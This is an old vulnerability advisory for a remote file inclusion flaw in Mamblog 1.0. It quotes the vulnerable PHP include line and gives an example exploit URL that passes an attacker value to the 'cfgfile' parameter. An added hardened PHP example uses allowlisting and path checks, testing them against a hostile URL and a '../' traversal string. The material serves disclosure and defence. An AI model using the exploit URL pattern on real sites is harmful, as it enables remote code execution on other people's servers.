Source : securityvulns

ID : SECURITYVULNS:DOC:13124

Date : Jun 13, 2006 - 12:00 a.m.

Mamblog 1.0 Version - Remote File Include Vulnerabilities

SaVSaK.CoM | SpC-x - The-BeKiR |

Risk : High

Class: Remote

Script : Mamblog

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

$cfgfile = "$mosConfig_absolute_path/components/$option/configuration.php";

include_once( $cfgfile );

Vulnerable :

http://www.victim.com/Mamblog/admin.mamblog.php?cfgfile=Command-Shell
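
A hardened counterpart to the include shown under "Code", as an added example that is not part of the original advisory and is not Mamblog code. The function name resolve_component_config, the allowlist, and the temporary directory layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not Mamblog code. The function name, the allowlist and the
// directory layout under the temporary base are assumptions for illustration.
function resolve_component_config(string $baseDir, string $option, array $allowed): ?string
{
    // The component name must match an allowlist entry exactly, so URL
    // schemes, slashes and "../" sequences never reach the filesystem.
    if (!in_array($option, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files.
    $path = realpath($base . '/components/' . $option . '/configuration.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    // Containment check: the resolved file must still live under the base.
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample layout in a temporary directory so the demo runs offline.
$base = sys_get_temp_dir() . '/mamblog_demo_' . getmypid();
mkdir($base . '/components/com_mamblog', 0700, true);
file_put_contents($base . '/components/com_mamblog/configuration.php', "<?php\n\$cfg = ['title' => 'demo'];\n");

// Constructed inputs: one legitimate component name and two untrusted values.
$inputs = ['com_mamblog', 'http://example.invalid/x?', '../../../../etc'];
foreach ($inputs as $option) {
    $file = resolve_component_config($base, $option, ['com_mamblog']);
    if ($file === null) {
        echo "rejected: $option\n";
        continue;
    }
    // The path comes from server-side values only, never from the request.
    include_once $file;
    echo "loaded:   $file\n";
}
```

As a second layer, `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops include from fetching URL targets even if a path check is missed.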